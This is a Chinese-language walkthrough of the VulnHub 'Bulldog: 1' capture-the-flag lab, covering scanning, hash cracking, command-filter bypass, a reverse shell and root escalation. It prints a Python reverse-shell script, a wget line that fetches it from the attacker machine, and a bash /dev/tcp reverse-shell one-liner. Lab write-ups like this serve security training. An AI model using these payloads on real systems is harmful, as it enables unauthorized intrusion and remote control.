VulnHub渗透测试实战靶场 - Bulldog: 1

环境下载

戳此进行环境下载

Bulldog: 1靶机搭建

具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡

  • 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式
  • 将VMware中桥接模式网卡设置为VritualBox的Host-only

获取到IP地址为:192.168.56.101

在这里插入图片描述

渗透测试

信息搜集

用Kali自带的Nmap扫描目标IP:sudo nmap -sS -A 192.168.56.101,发现开放了23、80、8080端口

在这里插入图片描述

dirsearch对web目录进行扫描:python3 dirsearch.py -u 192.168.56.101 -e *.php

在这里插入图片描述

漏洞挖掘

访问80端口

在这里插入图片描述

whatweb进行web站扫描:whatweb http://192.168.56.101/,发现是Django建站

http://192.168.56.101/ [200 OK] Bootstrap, Country[RESERVED][ZZ], maybe Django, HTML5, HTTPServer[WSGIServer/0.1 Python/2.7.12], IP[192.168.56.101], JQuery, Python[2.7.12], Script, Title[Bulldog Industries], X-Frame-Options[SAMEORIGIN]

依次访问扫描到的web目录

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

测试后发现,robots.txt页面没有什么有用的信息,/admin无法注入成功,在/dev发现一些可疑的hash值,解密后发现

6515229daf8dbdc8b89fed2e60f107433da5f2cb
破解失败
38882f3b81f8f2bc47d9f3119155b05f954892fb
破解失败
c6f7e34d5d08ba4a40dd5627508ccb55b425e279
破解失败
0e6ae9fe8af1cd4192865ac97ebf6bda414218a9
破解失败
553d917a396414ab99785694afd51df3a8a8a3e0
破解失败
ddf45997a7e18a25ad5f5cf222da64814dd060d5
bulldog
d8b8dd5e7f000b8dea26ef8428caf38c04466b3e
bulldoglover

尝试用得到的两组数据进行登录,发现可以用sarah:bulldoglover进行登录,登陆进去后使用web-shell

在这里插入图片描述

给了6个可用的命令,执行其他的命令会被拦截,这里用&或者|进行命令组合绕过,也可以用echo来绕过

在这里插入图片描述
在这里插入图片描述

getshell

发现可以成功绕过限制后,在Kali上用python起一个HTTP服务器:python2 -m SimpleHTTPServer 80,将把shell文件放到网站目录下,通过靶机下载用python写的shell反弹脚本

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.102",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

Payload:pwd&&wget http://192.168.56.102/shell.py,成功下载到shell文件

在这里插入图片描述

起一个监听:nc -nvvlp 1234,执行Payload:pwd&&python shell.py,成功反弹shell

在这里插入图片描述

补充一下用echo绕过的话反弹shell的姿势:echo ‘bash -i >& /dev/tcp/192.168.56.102/12340>&1’|bash

提权

首先用whoamiuname -acat /etc/issue查看一下有没有可以利用的信息

在这里插入图片描述

翻阅目录查找信息,在/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp中找到sudo的密码:SUPERultimatePASSWORDyouCANTget

在这里插入图片描述

提升权限至root:sudo python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值